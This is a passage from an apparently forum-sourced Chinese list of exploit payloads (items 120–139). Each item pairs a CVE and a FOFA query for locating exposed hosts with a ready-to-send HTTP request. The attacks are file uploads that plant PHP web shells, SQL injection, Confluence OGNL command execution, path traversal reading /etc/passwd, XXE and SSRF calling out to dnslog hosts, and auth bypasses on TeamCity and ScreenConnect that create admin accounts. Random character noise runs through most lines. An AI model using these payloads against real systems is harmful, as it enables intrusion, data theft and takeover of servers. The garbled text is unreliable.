6 z/ M8 L4 N$ s9 q y& |- Y2 \3 W0 a& T
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
5 F& E4 w8 n& D1 o. G* G; x, G U) t* M) p
) `2 A: P0 k5 t5 a4 q' B/ |' F
120. 北京百绰智能S40管理平台导入web.php任意文件上传
# i# I9 j6 c9 M5 ^6 J+ ^5 cCVE-2024-1253
3 c6 S0 R' j: k+ O' W3 DFOFA:title="Smart管理平台"
' h, [( h% u8 G. f! {POST /useratte/web.php? HTTP/1.1
8 I2 M5 p; |) k. D6 m; x( iHost: ip:port& q" u: r% p2 W0 k. c* M
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
+ a! k5 p$ S, |+ }4 C2 SUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
- _7 I# B$ R. Z7 |% D* v& \% F' ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" _6 a7 V) n0 L* O w# Q' ~$ V+ C4 {
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% \+ X: I0 E9 x- \9 R! {! uAccept-Encoding: gzip, deflate4 p+ J( p" | a: }/ Y& Q
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
( h5 G" r7 W0 Q0 V- D6 p. ?Content-Length: 597
: k' {( D3 X+ l8 c) v( U) E3 nOrigin: https://ip:port, M. ?/ c% \, D+ B e7 h$ q: W: H
Referer: https://ip:port/sysmanage/licence.php
' s9 e% s! k( O. P$ [+ lUpgrade-Insecure-Requests: 10 ^, C- K# n* D
Sec-Fetch-Dest: document' d: K; q7 i# r/ U" d% U
Sec-Fetch-Mode: navigate& z! ^- S/ p4 R. T# d2 @% q
Sec-Fetch-Site: same-origin. \. Q5 }! ?+ `: v1 U, c- E
Sec-Fetch-User: ?1
7 N& u/ E1 J. h1 f* `Te: trailers! N+ M% J1 n# W. ]+ k( s
Connection: close
* H8 R. }1 M6 W0 ]% ]; w% T6 {% E, e# {+ S: n
-----------------------------42328904123665875270630079328$ l8 u; ^" }* }
Content-Disposition: form-data; name="file_upload"; filename="2.php"( w5 J D# T0 g& ~* U
Content-Type: application/octet-stream
; ^6 H" A+ e X+ Y9 m4 ?$ c2 V+ f& x5 a, ~- I* f
<?php phpinfo()?>
K) P5 @& i d# t7 M& I' K( ?9 U: `* W-----------------------------42328904123665875270630079328
3 U9 J6 U a% A' w2 X* ?) w$ v0 t4 c0 ]Content-Disposition: form-data; name="id_type"! Z* r m( f6 ~8 M' B
& x, \% b: p9 b+ K* I$ r17 }+ ^# E0 P( r( W
-----------------------------423289041236658752706300793283 R8 C- y% j! c) X
Content-Disposition: form-data; name="1_ck"6 a" D8 f# [. D3 x/ \
& \' c! j6 l$ d+ M/ ?3 F+ ^6 ?8 I
1_radhttp
9 d& e( M/ h% t: E$ {( o, L. R' B-----------------------------42328904123665875270630079328
% `: U; Q( }/ ]# eContent-Disposition: form-data; name="mode") t$ f# u0 K3 [1 o# f
9 X4 S# m7 P6 w. Z) Z) {import
- [* T. n v/ S& \; C-----------------------------42328904123665875270630079328
9 T! \0 K* u! D/ b% R$ n8 H* p, z4 A- E; q+ u# I( {$ m: F
- n4 w: Q: c9 D/ b2 @文件路径/upload/2.php3 _9 `8 t7 N' U/ |8 j& J
. B0 U- `; q5 _6 {# e5 N121. 北京百绰智能S42管理平台userattestation.php任意文件上传
' n5 A; e8 j P2 cCVE-2024-1918
9 h# U% B4 |+ C# |& y- f& a3 ~FOFA:title="Smart管理平台"
0 k0 u6 Z) C" @* HPOST /useratte/userattestation.php HTTP/1.1
, ^+ l' z; d/ A5 J$ w, FHost: 192.168.40.130:8443
9 z k" q0 E. J0 I- Y7 e) cCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50& j/ _) X* w7 s, }, X1 ~" s e
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
7 N; z2 _) o8 [2 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% D9 ]' Q6 {" @5 SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% o+ B8 d1 B! O' l h. U. r
Accept-Encoding: gzip, deflate3 J, n8 j; n" X
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
& f; C/ ?' m: a7 L- mContent-Length: 592. B: y1 ^, v- \7 n5 J6 J
Origin: https://192.168.40.130:8443
8 H1 w5 ]6 y# s1 v6 U8 a% p+ k* T Z; PUpgrade-Insecure-Requests: 1- e, W9 \4 X: K! L. N
Sec-Fetch-Dest: document
4 A3 `+ _: P: F. h) hSec-Fetch-Mode: navigate
! F8 }% ~+ Z0 m! ?$ l' YSec-Fetch-Site: same-origin/ {8 E* Y# ~0 z9 u2 D
Sec-Fetch-User: ?1
1 e3 C0 i" S# C% rTe: trailers8 w7 \ s( W9 e2 g
Connection: close+ P+ f$ J2 r0 H- i4 g
* K4 A" |3 p" N+ f% }3 o-----------------------------42328904123665875270630079328+ n, J2 s# z% L* {
Content-Disposition: form-data; name="web_img"; filename="1.php"
; q( ^' S1 f# [0 R% v" V) TContent-Type: application/octet-stream
! p8 `) w- d2 b/ t. k4 V6 ~9 h8 L
<?php phpinfo();?>* Q; R$ [/ i# _# B8 ?9 C! m
-----------------------------42328904123665875270630079328
2 K2 W" i7 _+ K& w/ h6 O( Z- gContent-Disposition: form-data; name="id_type"- G6 d# K L1 `3 e
]/ e1 p% m- K1
" m; o# h R. d5 |0 K-----------------------------42328904123665875270630079328
# O, }: G" _' T& M: rContent-Disposition: form-data; name="1_ck"
" I7 _4 X* F0 g
: o6 c2 s" H. m1 Y0 _+ i% E1_radhttp+ V# u I! T0 I
-----------------------------42328904123665875270630079328, E9 I1 D( }! i# I2 K
Content-Disposition: form-data; name="hidwel"
* ^ Z2 @5 h4 x0 j% C+ e6 u6 @; j: e$ A/ J
set( m' @6 V8 h& T1 C& b) C( P
-----------------------------42328904123665875270630079328
7 W% k: H: w! J: d3 C2 i
9 \6 W; D) }8 r- A
2 f4 H# z5 Q& c& F1 l2 E( yboot/web/upload/weblogo/1.php
* f: I X* ^; f1 B: I) P1 _/ d4 w7 a1 k2 [
122. 北京百绰智能s200管理平台/importexport.php sql注入. a( E" y$ G4 K) |
CVE-2024-27718FOFA:title="Smart管理平台"
( ^" _* U9 ]. y6 ]/ s' Q# {8 d其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()* s# Q0 \. Z, V6 g
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1. @7 u2 R4 n4 y7 b
Host: x.x.x.x( W6 X1 E& [1 y6 z6 ^
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
0 N. g# _1 x' A) MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
8 r7 |+ a/ b; @+ vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" I; c/ _0 x* Q1 A7 O7 s& k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: M1 j0 ]+ u( R- h" s
Accept-Encoding: gzip, deflate, br
! R' t0 | G: b4 E% h% @% oUpgrade-Insecure-Requests: 1
) w) W& f0 K. N, Z( L9 |5 `Sec-Fetch-Dest: document$ {) i3 b* [( I, z, `
Sec-Fetch-Mode: navigate
' n' B( ~* ]3 B4 ?Sec-Fetch-Site: none/ P9 V) w) I* A. i6 _% T9 e
Sec-Fetch-User: ?1
( M- B( t$ O" M. Q! XTe: trailers' b. n/ Z# m) ]- [) t4 Z
Connection: close
) r2 R1 p0 {: x
+ T) W: @0 k# Q3 V5 Y/ ^5 h0 w! M3 G( [, X% V
123. Atlassian Confluence 模板注入代码执行
( Z( [. G# W' m* G0 v r& Q! B6 zFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
! C$ N0 g; X: B" y5 O. RPOST /template/aui/text-inline.vm HTTP/1.1, q) Z) V% j, U4 G
Host: localhost:8090# b# \$ f$ W9 C8 X
Accept-Encoding: gzip, deflate, br
+ x2 f% T& }# y4 k4 \Accept: */*
- o. g+ Y, r1 f' a4 o" @Accept-Language: en-US;q=0.9,en;q=0.8) `) H5 h1 V7 k, o, q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36! S- a6 d* G. C
Connection: close
* a) }' ?* J/ ~Content-Type: application/x-www-form-urlencoded5 b( S9 v4 ~% l" r8 z
- ]+ v* r1 s- [) F0 @, ^' d; v1 s3 W
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))- W7 s3 g" g7 X- e4 l: \
* r" ^. A9 J4 `) L9 m
" P1 Q: W8 i% o$ c$ j( a124. 湖南建研工程质量检测系统任意文件上传7 s9 T0 q7 ]% _) ~
FOFA:body="/Content/Theme/Standard/webSite/login.css"
3 A6 x6 P# @% r1 r# iPOST /Scripts/admintool?type=updatefile HTTP/1.1
3 m; g! P/ f" f) S* yHost: 192.168.40.130:8282
5 O9 n2 S6 x. ~User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.363 i. X% g4 ^8 X( c! U3 [$ ^: Q7 P
Content-Length: 72
# F; O7 t s) ~0 V# \( _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8, l) p* w+ z. P* Y1 V6 m
Accept-Encoding: gzip, deflate, br# v: `3 m) a7 h4 l. c1 g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' @% S; N0 [7 j+ F$ h( DConnection: close7 R5 F5 {, f8 U
Content-Type: application/x-www-form-urlencoded
6 v* m6 Y6 A1 A# R0 \0 @! L% q7 A! ^! W; o# r
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
& q5 u( H; G9 @ B
) }2 E6 }& a( h0 L$ h) c3 {
, q% L! A1 q! b6 u% j9 S x6 N9 nhttp://192.168.40.130:8282/Scripts/abcgcg.aspx/ j/ h) u. a3 V: | s; L! d: ]
* J8 f4 _7 b8 l, Z6 c& M. Q
125. ConnectWise ScreenConnect身份验证绕过' W% M* h" M# W5 D
CVE-2024-1709! a0 O. Z7 j7 j9 G
FOFA:icon_hash="-82958153"
! W4 _' h7 [5 v/ n2 Shttps://github.com/watchtowrlabs ... bypass-add-user-poc6 F/ Q2 e* `; G- j: H M+ i
' ?, F; O, v$ b1 e" g) h' n; D
/ o3 }- c( }6 e" U. R使用方法5 R, o$ F5 n3 h: N K* I) ~- X
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!$ g% J$ U# K) `. t, X% x; J$ L
* b) V4 K; E, e
' C4 Y. o# g* e2 L+ W创建好用户后直接登录后台,可以执行系统命令。% b) m w" M: i' o4 S
5 s7 x" c; k( S, v3 V
126. Aiohttp 路径遍历
/ Q" P8 o0 w. L* ]FOFA:title=="ComfyUI"
3 c1 A- c4 s1 [! L- dGET /static/../../../../../etc/passwd HTTP/1.1! i& C+ ]8 y0 e3 E
Host: x.x.x.x
; B) v/ d0 S8 \- U6 _, lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
% ]5 N4 M2 s W+ ~# u" Q( E; [6 N# ?Connection: close" G( n3 M" b( E8 l6 [# {" a3 k
Accept: */*' o# ]0 n9 [; ~# ^" E: [
Accept-Language: en
* c+ E" x0 |4 W6 V( ZAccept-Encoding: gzip
# j4 C" |; S$ R' {
+ n8 }/ G5 ]$ }5 x4 ` ?( ~! y: D/ {% P/ O x, ?7 H/ C
127. 广联达Linkworks DataExchange.ashx XXE5 h; M g- R! K8 C* E
FOFA:body="Services/Identification/login.ashx"
( j9 @7 I' Z# |1 APOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
' O, X. x- A: o5 XHost: 192.168.40.130:88884 y! Y5 Q+ w c1 g: x. y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
$ m; L( r: O/ i; V SContent-Length: 415
/ a3 g Q- K9 ?2 b( fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 U0 w5 |! R: {6 P7 `5 _
Accept-Encoding: gzip, deflate
; j+ [" ~( O0 Y3 lAccept-Language: zh-CN,zh;q=0.9
; _- [9 }( }9 x; t/ aConnection: close# @" P7 {9 P2 n( A. k2 R Y& ~) h
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
: s# V# g( `4 Q, S4 mPurpose: prefetch, P; f5 G) Z2 o1 S3 e7 G
Sec-Purpose: prefetch;prerender0 ^5 J* @$ Y5 d: D
5 s1 G! y' x5 Y/ e* Q------WebKitFormBoundaryJGgV5l5ta05yAIe0
2 J1 J% d4 ~4 L) _; B) N" \+ EContent-Disposition: form-data;name="SystemName", p9 s$ _0 R3 F* @( K8 i
2 E8 T$ x" K4 @/ J3 jBIM
w' X( l/ Z1 j9 F& [------WebKitFormBoundaryJGgV5l5ta05yAIe0
) o" h: z, ]3 f; fContent-Disposition: form-data;name="Params"
. l& a; Q4 B" N$ ZContent-Type: text/plain1 r# C9 Q7 F& W$ V( Y
. \( {: n( u- k9 f# s7 j7 `9 v<?xml version="1.0" encoding="UTF-8"?>) W3 U) H' V6 e! l: u: W
<!DOCTYPE test [4 ~! T7 ^7 D3 ~
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
" z0 Z' B# l4 M' |$ |8 b- g]
& J* T% e0 h* K3 T>
5 h% F6 w ^1 F5 I- m0 h* g3 @<test>&t;</test>
; M9 d. ~" I! {2 \' E3 c" K6 R------WebKitFormBoundaryJGgV5l5ta05yAIe0--% u4 r5 \3 U ]$ i% d4 Q9 W
4 L. g( y) A3 T6 q# T/ Q2 U, K$ m) u" y3 ^
; r, m+ |+ f: d: n, i; H7 R0 g$ C
128. Adobe ColdFusion 反序列化: ]( u) u R" U; C
CVE-2023-38203
" X7 U1 j5 I1 T9 Q U0 ^+ BAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本). m6 v0 B, L9 _8 _
FOFA:app="Adobe-ColdFusion"- F0 N+ p: U8 i G1 K d4 h
PAYLOAD9 H' k/ S8 l0 m: R
; P/ g0 u, d7 F9 l" B c129. Adobe ColdFusion 任意文件读取# e$ A8 R, d. B) F
CVE-2024-20767
/ \9 u; e K/ J6 A- x' h4 ~FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
; L6 Q8 }8 \+ X5 R第一步,获取uuid6 Z% I- i7 O5 c, F% }! i
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
9 U% j5 q$ |6 X& ]Host: x.x.x.x& z: q- q, c, b2 g0 e: e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
0 K6 d. Y! c: rAccept: */*
% i5 n: }2 s/ I% d TAccept-Encoding: gzip, deflate
% W0 X. d$ U, P* RConnection: close8 {) O- z. v5 J
0 r8 [; O4 U, T1 v; m
7 ~' j9 V( F" }1 G' L! B; @& W第二步,读取/etc/passwd文件. |2 @- r* _! {: Y7 f
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1* R- F/ }1 @& f# A1 N
Host: x.x.x.x+ F( J7 s% l+ E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36, q3 u6 U1 }7 w! n
Accept: */*8 C* X6 V X2 l" ?
Accept-Encoding: gzip, deflate( c' W h$ o) }/ N! q8 w6 G; K
Connection: close
0 J n/ x0 q- Y! Guuid: 85f60018-a654-4410-a783-f81cbd5000b90 k9 z% ]. D" k. ?+ o6 H
/ J6 ^, c, C3 G+ U
" I# f1 | y6 v, D% j9 Q130. Laykefu客服系统任意文件上传: @2 B' v4 ^) u4 m c' y, W
FOFA:icon_hash="-334624619"( M3 G8 b9 Z. W# s, V) D
POST /admin/users/upavatar.html HTTP/1.1
4 M3 q# `2 t6 m" ^% K# VHost: 127.0.0.1) c0 _% G9 C; B, Z
Accept: application/json, text/javascript, */*; q=0.01
+ Y8 C# {' `5 ]: sX-Requested-With: XMLHttpRequest
' B% ]4 f) T+ A- X+ f @User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26* |; a. B [' S1 [# R
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
8 q0 E! L& |3 m9 [0 z4 ^Accept-Encoding: gzip, deflate
6 s/ N' l2 c7 G8 H: Y$ |Accept-Language: zh-CN,zh;q=0.97 d6 Y4 I3 \1 [" j4 X9 W
Cookie: user_name=1; user_id=31 W! l( }1 H9 v' U
Connection: close
" j% y; x/ S5 r! A0 g/ K
& s3 c6 v" @) I------WebKitFormBoundary3OCVBiwBVsNuB2kR
- G6 L5 p, [# U& w# z' ]' \( J# OContent-Disposition: form-data; name="file"; filename="1.php"
, k: Z) m6 Z% ^# w/ o' ZContent-Type: image/png
^, |3 I' |* y) k; |
# N! D6 j" T% E3 ?) }<?php phpinfo();@eval($_POST['sec']);?>
% ?7 O5 \7 m; o9 L------WebKitFormBoundary3OCVBiwBVsNuB2kR--# K+ h- S# x, w, m+ l0 s
; d. f. n3 ]: V& H
; J8 \2 s5 N1 Y131. Mini-Tmall <=20231017 SQL注入8 W- r. Q Q4 i! l
FOFA:icon_hash="-2087517259"8 i; G4 M Z3 A3 e: u
后台地址:http://localhost:8080/tmall/admin3 A5 T' t3 f9 r6 _7 c8 `
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
( s" C& T+ P* D- x1 X& J4 O
0 q* |+ c2 t4 V132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过8 A7 u, ], k# m* n
CVE-2024-271980 \- g! B8 p/ U3 }
FOFA:body="Log in to TeamCity"
+ S) y% {+ z" D- [# _; f+ T" e" {$ V2 UPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
/ }% v4 ~7 w" w+ A6 U4 wHost: 192.168.40.130:8111% M# |+ B3 r2 w# n* e& ~( P! T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ O) x% [, `- u ]" X8 \3 u0 `1 lAccept: */*5 v0 G: P4 T# V' K
Content-Type: application/json- R& f# ^* N8 e9 I
Accept-Encoding: gzip, deflate. g& B; n- c2 z1 T* j
; X' z$ A! M5 }& R2 s, a) f8 ^
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}} C- a) r; w6 Y7 }- D1 u
: L+ Y4 T( b& D0 L4 n: g" ]8 j* |% d! f8 }) k
CVE-2024-27199) h8 K& N' N5 w+ h8 n/ G* l3 Z1 D
/res/../admin/diagnostic.jsp; ]& `- S* y- a: w
/.well-known/acme-challenge/../../admin/diagnostic.jsp
) Q) ] J" A- {4 ~3 q3 z/update/../admin/diagnostic.jsp& `( L3 [0 O# t. l, n/ b3 t
6 P+ C: {4 i! s/ z& u5 `7 A
+ Z$ x! l3 B; c4 _# k; ICVE-2024-27198-RCE.py
2 c+ e& p2 i8 [! [9 g0 L! v6 A1 O9 h9 H! y6 {& n
133. H5 云商城 file.php 文件上传
+ m8 ]% U5 v; e, E8 ]FOFA:body="/public/qbsp.php"% @+ q* @8 z) `/ Z6 |6 A2 H7 g6 c0 X
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
+ q$ Z3 K5 a! ^2 g, s g) IHost: your-ip
5 J- C8 C: o+ [9 s' d" Q; `/ P3 ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
* \1 Y9 Q% A, s1 SContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx9 t2 `: r7 X, F [/ u. o
# D6 T( Y; {+ i: F' W8 Y" n' P------WebKitFormBoundaryFQqYtrIWb8iBxUCx' y% R d& ~) ]; R- e% ^+ z. ~
Content-Disposition: form-data; name="file"; filename="rce.php"8 B7 Z5 p, n- S# E
Content-Type: application/octet-stream) m) d, ~& C2 @1 U, J h: D; r
8 }& W% A) h) a) R' _. K<?php system("cat /etc/passwd");unlink(__FILE__);?>
3 a/ Z! j) O5 Z7 `3 D2 X------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
t) ?, \) q7 C* a. g U# k( ^8 z( t9 T! ]2 z: V. P- @
, `: q, \$ G3 R7 I$ V
0 `9 Q4 v( T4 y: z! P' Z134. 网康NS-ASG应用安全网关index.php sql注入
$ a& m* ?# w6 K0 h; }CVE-2024-23301 I, T" W% @4 D7 [& R" S" h0 B9 D
Netentsec NS-ASG Application Security Gateway 6.3版本
y- S4 z' p/ _3 ?6 `7 m% MFOFA:app="网康科技-NS-ASG安全网关"
- W. B' v6 J( X& g$ GPOST /protocol/index.php HTTP/1.1; f0 h( n. x8 p& K. J
Host: x.x.x.x
! |2 V' b; v0 K P! ^. k* t$ J. LCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
6 |/ K6 m, @1 d; b' _ u3 r! pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
( t8 [8 o y% P# o/ M! e2 b! YAccept: */*
, h4 p5 x3 a) v" tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; X& T$ _+ c5 O' B& `
Accept-Encoding: gzip, deflate! c, m" |8 @/ m9 W5 ]
Sec-Fetch-Dest: empty
! ~# x& n$ r6 {& kSec-Fetch-Mode: cors
8 B6 s" {( V1 t$ c6 G6 d, W$ \+ uSec-Fetch-Site: same-origin/ S+ m# m# Q: K0 w, M5 s
Te: trailers5 G) R8 [& G: e& v
Connection: close
) u( X G7 \# A8 L1 X+ e7 I/ B" h, cContent-Type: application/x-www-form-urlencoded3 r- W" S7 H4 n
Content-Length: 263% d8 f7 i- Q* E, K
6 ?2 x- C6 C9 \! njsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
) R/ B% S; l! g2 D: }# d+ {% u# x4 ~; G! q( d' [
* x. T' ]" k" G
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入* x" c/ `( m5 W
CVE-2024-2022
4 _* w( J# i6 ~Netentsec NS-ASG Application Security Gateway 6.3版本
7 H) U+ n# v/ o: Y0 ^% S/ HFOFA:app="网康科技-NS-ASG安全网关"
X* u' ?# ?! x1 LGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.13 T3 `7 q) ~0 ]% x* {3 m
Host: x.x.x.x
3 H& x: |( C+ k) O3 b+ ]' c1 U1 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ |8 x4 s( z( c5 y9 Z# RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 j% J7 Y6 [# Y. r% X2 |
Accept-Encoding: gzip, deflate( H6 B/ s/ E( c: _
Accept-Language: zh-CN,zh;q=0.9
9 _0 S4 y8 h: b) |% J! B1 M# i% FConnection: close3 {8 t% z0 m; |- b- M5 K# {
- Z$ v& U% B& ] c. e% v6 D- s
5 x' I4 F: O+ L, T7 d# ]# | [) b0 ?136. NextChat cors SSRF
& _! D8 ~$ X8 t3 D) E* I1 DCVE-2023-497853 N) q% w, C/ I$ y/ g6 R F( \3 r
FOFA:title="NextChat"6 n. e8 m% V, a3 R
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.18 S: E9 w7 n# I- y# v
Host: x.x.x.x:10000$ ]' {7 O2 d& B$ t3 E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% _6 h4 [7 I' J% y
Connection: close
& _2 H! x: v2 d8 v1 A/ v8 U6 ~Accept: */*: }% \& c" R5 p% {
Accept-Language: en! {) j9 c9 U0 Y: N" `/ n/ [
Accept-Encoding: gzip' q* J6 m/ q/ V* \2 |6 F
. ^: d B8 w$ c1 c" G$ b5 ]- d- D; Z. r% |6 b8 [
137. 福建科立迅通信指挥调度平台down_file.php sql注入
' B2 v! U! {: o$ }) DCVE-2024-2620
& `( b0 p6 ]/ }; _FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
& `5 f9 V7 r9 z% DGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.12 b1 O" y$ a- N+ G
Host: x.x.x.x, a' h: I' M4 }( F. v2 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
" K( {9 L0 U; _0 {& c8 _ ]1 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! N/ D9 j5 W' `* B$ yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 u; ^7 e5 _% N, j. }2 NAccept-Encoding: gzip, deflate, br
/ {# J! f. b( A6 I+ @& {Connection: close* w2 w5 _7 f0 V. q' Z8 R* b
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj1 o& u: [, |% J& ~. `$ r+ s
Upgrade-Insecure-Requests: 1
: r) v, l# ?! l. U) }) t& p
/ c0 g( s# m) Y2 }0 u
$ Q# }- q$ r# R7 S0 k1 c- K4 q138. 福建科立讯通信指挥调度平台pwd_update.php sql注入/ C1 m1 n: d& Z
CVE-2024-2621
# S- ^% ~5 B3 F# m3 PFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
7 x9 _+ {- n0 G" p5 }GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1( j9 z) Y6 o1 u% S" c" H+ U
Host: x.x.x.x
* W6 c8 }3 i7 w* k: BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; @0 N# u" J2 C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ a- y' u! h+ D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 N- i5 m. }; M- h# m6 y, v" Y, B
Accept-Encoding: gzip, deflate, br
9 t. b, y" x# d7 x: E$ W. C6 qConnection: close7 s2 r+ o( V! j& z
Upgrade-Insecure-Requests: 1
f0 x+ }+ Z G( `1 Y5 }* R0 K: X5 P. ^9 e
7 d% T! n t2 T, p' {$ ?" P9 E139. 福建科立讯通信指挥调度平台editemedia.php sql注入
0 N$ ]9 P& ~9 w8 {) p. i- ~; u! PCVE-2024-2622
. L) U' r u9 j: sFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"7 F' n# i- r' S( d e* g
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
b5 ^7 e. X% ~" |Host: x.x.x.x- S- L/ e! G8 s+ E- p. L6 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
